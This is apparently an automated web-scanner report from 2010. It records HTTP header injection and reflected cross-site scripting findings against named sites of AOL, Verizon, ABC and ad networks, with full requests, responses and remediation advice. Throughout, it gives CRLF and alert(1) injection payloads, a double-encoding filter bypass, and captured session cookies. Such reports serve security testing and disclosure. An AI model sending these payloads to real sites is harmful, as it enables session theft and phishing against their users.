HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
1.1. http://50.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://50.xg4ken.com
Path:
/media/redir.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 914c0%0d%0a5ae8a0d6760 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3A%2F%2Fwww.perpetual.com.au%2Finvestors.aspx&914c0%0d%0a5ae8a0d6760=1 HTTP/1.1 Host: 50.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 20 Nov 2010 03:31:19 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=0cb9eb0e-696a-22c8-5249-00007193de3f; expires=Fri, 18-Feb-2011 03:31:19 GMT; path=/; domain=.xg4ken.com Location: http://www.perpetual.com.au/investors.aspx?914c0 5ae8a0d6760=1 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The value of the url[] request parameter is copied into the Location response header. The payload 4c016%0d%0a04bb2c362b6 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3A%2F%2Fwww.perpetual.com.au%2Finvestors.aspx4c016%0d%0a04bb2c362b6 HTTP/1.1 Host: 50.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 20 Nov 2010 03:31:16 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=555531e9-31c0-9dc9-aa49-0000346e4fb7; expires=Fri, 18-Feb-2011 03:31:16 GMT; path=/; domain=.xg4ken.com Location: http://www.perpetual.com.au/investors.aspx4c016 04bb2c362b6 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The value of REST URL parameter 1 is copied into the Location response header. The payload 65bc6%0d%0a7e707f3a9da was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload ae7c8%0d%0a3218649ce4b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of the ES cookie is copied into the Set-Cookie response header. The payload b8b0f%0d%0a3bcadb1b34c was submitted in the ES cookie. This caused a response containing an injected HTTP header.
The value of the code request parameter is copied into the Location response header. The payload 32c9e%0d%0a01ddaa8666 was submitted in the code parameter. This caused a response containing an injected HTTP header.
The value of the site request parameter is copied into the Location response header. The payload dc9f3%0d%0a23628b7f9c8 was submitted in the site parameter. This caused a response containing an injected HTTP header.
The value of the N cookie is copied into the Set-Cookie response header. The payload 1b57e%0d%0a47dfc6b5cfd was submitted in the N cookie. This caused a response containing an injected HTTP header.
Request
GET /rtx/r.js HTTP/1.1 Host: anrtx.tacoda.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TID=16e8oqe01cg8de; Anxd=x; N=2:fd178a2029727e2044734a1f872c09cd,fd178a2029727e2044734a1f872c09cd1b57e%0d%0a47dfc6b5cfd; TData=99999|^|50085|54057|60490|#|50212|50220|60183|50216|50229|60185; Tsid=0^1290207076^1290208930|16728^1290207076^1290208930|18251^1290207125^1290208925; ANRTT=50212^1^1290640895|50220^1^1290640895|60183^1^1290811930|50216^1^1290811885|50229^1^1290811894|60185^1^1290811925;
Response
HTTP/1.1 200 OK Date: Fri, 19 Nov 2010 23:45:29 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Cache-Control: max-age=900 Expires: Sat, 20 Nov 2010 00:00:29 GMT Set-Cookie: ANRTT=50212^1^1290640895|50220^1^1290640895|60183^1^1290811930|50216^1^1290811885|50229^1^1290811894|60185^1^1290811925; path=/; expires=Fri, 26-Nov-10 23:45:29 GMT; domain=.tacoda.net Set-Cookie: Tsid=; path=/; expires=Thu, 19-Nov-09 23:45:29 GMT; domain=.tacoda.net Set-Cookie: TData=99999|^|50085|54057|60490|#|50212|50220|60183|50216|50229|60185; expires=Mon, 14-Nov-11 23:45:29 GMT; path=/; domain=.tacoda.net Set-Cookie: Anxd=x; expires=Sat, 20-Nov-10 05:45:29 GMT; path=/; domain=.tacoda.net Set-Cookie: N=2:fd178a2029727e2044734a1f872c09cd1b57e 47dfc6b5cfd,fd178a2029727e2044734a1f872c09cd; expires=Mon, 14-Nov-11 23:45:29 GMT; path=/; domain=.tacoda.net Content-Length: 90 Keep-Alive: timeout=60, max=965 Connection: Keep-Alive Content-Type: application/x-javascript
var ANUT=1; var ANOO=0; var ANSR=0; var ANTID='16e8oqe01cg8de'; var ANSL; ANRTXR();
The value of the si request parameter is copied into the Set-Cookie response header. The payload 2317e%0d%0a6638b1327e8 was submitted in the si parameter. This caused a response containing an injected HTTP header.
The value of the goto request parameter is copied into the Location response header. The payload 468b3%0d%0ae6a869cb573 was submitted in the goto parameter. This caused a response containing an injected HTTP header.
The value of the goto request parameter is copied into the Location response header. The payload 794ac%0d%0a4d3881665ea was submitted in the goto parameter. This caused a response containing an injected HTTP header.
Request
GET /amserver/UI/Login?realm=dotnet&module=AIAWN&goto=794ac%0d%0a4d3881665ea HTTP/1.1 Host: auth.verizon.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=webmail; JSESSIONID=2D7E445097FDA183EEB1FF24695BC505; amlbcookie=02; AMAuthCookie=LOGOUT; POPRefid=refid=&refresh=y&reftrytime=0&refnum=;
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
2.1. http://abc.go.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://abc.go.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80597"%3balert(1)//8ad75bcf9ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80597";alert(1)//8ad75bcf9ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?80597"%3balert(1)//8ad75bcf9ec=1 HTTP/1.1 Host: abc.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Content-Length: 97885 Content-Type: text/html; charset=UTF-8 Last-Modified: Fri, 19 Nov 2010 23:38:23 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abc06 X-Powered-By: ASP.NET Set-Cookie: SWID=FE2AB8A7-AB90-4FDD-9541-F9BB3ED0890A; path=/; expires=Fri, 19-Nov-2030 23:38:22 GMT; domain=.go.com; Cache-Expires: Fri, 19 Nov 2010 23:53:22 GMT Date: Fri, 19 Nov 2010 23:38:22 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://developers.facebook.com/schem ...[SNIP]... bc.csar.go.com/DynamicCSAd?srvc=abc&itype=ThinBanner&itype=Rectangles&itype=Background&itype=LRGutters&itype=PopUnder&itype=Survey&itype=FPBranding&itype=Banner-Unicast&itype=RevenueScience&url=/index?80597";alert(1)//8ad75bcf9ec=1"; var paramD = "&"; var regexS = "[\?&]test=([^&#]*)"; var regex = new RegExp( regexS ); var resultsT = regex.exec( window.location.href ); if(resultsT != null) csarUrl += paramD + "test="+ resul ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9bfc"%3bc758afbe8ca was submitted in the REST URL parameter 1. This input was echoed as d9bfc";c758afbe8ca in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetworkd9bfc"%3bc758afbe8ca/aol_pp HTTP/1.1 Host: about.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=1523306440.1441850444.592896; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Fri, 19 Nov 2010 23:38:35 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 10535 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ln31 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-ln31.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetworkd9bfc";c758afbe8ca"; s_265.prop2="aol_pp"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b6e0"%3b62d3162371a was submitted in the REST URL parameter 1. This input was echoed as 5b6e0";62d3162371a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetwork5b6e0"%3b62d3162371a/aolcom_terms HTTP/1.1 Host: about.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=1523306440.1441850444.1124666368; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Fri, 19 Nov 2010 23:38:38 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 10547 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ln31 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-ln31.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetwork5b6e0";62d3162371a"; s_265.prop2="aolcom_terms"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 866c5"%3bc2c3419ad15 was submitted in the REST URL parameter 1. This input was echoed as 866c5";c2c3419ad15 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetwork866c5"%3bc2c3419ad15/copyright_infringement HTTP/1.1 Host: about.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=1523306440.1441850444.2198408192; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Fri, 19 Nov 2010 23:38:40 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 10567 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ln31 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-ln31.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetwork866c5";c2c3419ad15"; s_265.prop2="copyright_infringement"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43ebc"%3b89a48e93d80 was submitted in the REST URL parameter 1. This input was echoed as 43ebc";89a48e93d80 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetwork43ebc"%3b89a48e93d80/trademarks HTTP/1.1 Host: about.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=1523306440.1441850444.269028352; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Fri, 19 Nov 2010 23:38:36 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 10541 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ln31 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-ln31.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetwork43ebc";89a48e93d80"; s_265.prop2="trademarks"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83291%2522%253b5bb1d8c030d was submitted in the authLev parameter. This input was echoed as 83291";5bb1d8c030d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the authLev request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /opr/_cqr/opr/opr.psp?sitedomain=sns.webmail.aol.com&authLev=083291%2522%253b5bb1d8c030d&siteState=ver%3A4%7Crt%3ASTANDARD%7Cat%3ASNS%7Cld%3Awebmail.aol.com%7Cuv%3AAOL%7Clc%3Aen-us%7Cmt%3AAOL%7Csnt%3AScreenName%7Csid%3Ab8f0c4b0-0c85-446d-b863-b15687c1024d&lang=en&locale=us&offerId=newmail-en-us-v2&seamless=novl HTTP/1.1 Host: account.login.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.0 200 OK Date: Fri, 19 Nov 2010 23:39:11 GMT Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: OPR_SC=diAxLjAga2lkIDAgUWtnaFZheXBieUMzVFM2TUwrK29JaTIzd1pRPQ%3D%3D-NcFbxVvZ3cH4d3%2Bx%2BogHkrjcziFFwz%2Bb; Domain=account.login.aol.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US P3P: CP="PHY ONL PRE STA CURi OUR IND" Content-Length: 2920 Connection: close
The value of the clk0 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5546"%3balert(1)//a772291970e was submitted in the clk0 parameter. This input was echoed as b5546";alert(1)//a772291970e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the clk0 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f766a"><script>alert(1)</script>38e82e8f2db was submitted in the clk0 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69d29'-alert(1)-'825c464d51d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.10. http://vulnerable.verizon.host/adi/N3405.Sympatico.ca/B5011284.3 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://vulnerable.verizon.host
Path:
/adi/N3405.Sympatico.ca/B5011284.3
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ebe8"-alert(1)-"51601b54316 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3405.Sympatico.ca/B5011284.3;sz=728x90;ord=195270203?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/191227999.191250938/164327256/direct/01%3fhref=&6ebe8"-alert(1)-"51601b54316=1 HTTP/1.1 Host: vulnerable.verizon.host Proxy-Connection: keep-alive Referer: http://redcated/D21/iview/164327256/direct;wi.728;hi.90/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:07:33 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6974
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... e=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/191227999.191250938/164327256/direct/01%3fhref=&6ebe8"-alert(1)-"51601b54316=1http%3a%2f%2frbc.bridgetrack.com/bank/_redir.htm%3FBTData%3D6021A7B776679675D54424BB7A2A5AFA09E9D9F81FEFBF8F3F4C2A01B149%26BT_TRF%3D11030%26ASC%3DAD0028"); var fscUrl = url; var fscUrlClickTagFound ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e0da"-alert(1)-"8fdfe6c6257 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3405.Sympatico.ca/B5011284.3;sz=728x90;ord=195270203?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/191227999.191250938/164327256/direct/01%3fhref=6e0da"-alert(1)-"8fdfe6c6257 HTTP/1.1 Host: vulnerable.verizon.host Proxy-Connection: keep-alive Referer: http://redcated/D21/iview/164327256/direct;wi.728;hi.90/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:07:02 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6899
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... be=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/191227999.191250938/164327256/direct/01%3fhref=6e0da"-alert(1)-"8fdfe6c6257http://rbc.bridgetrack.com/bank/_redir.htm?BTData=6021A7B776679675D54424BB7A2A5AFA09C9D9F81FEFBF8F3F4C2AE0B149&BT_TRF=11030&ASC=AD0033"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode ...[SNIP]...
2.12. http://vulnerable.verizon.host/adi/N3995.275551.SYMPATICOCANADA/B5002719 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://vulnerable.verizon.host
Path:
/adi/N3995.275551.SYMPATICOCANADA/B5002719
Issue detail
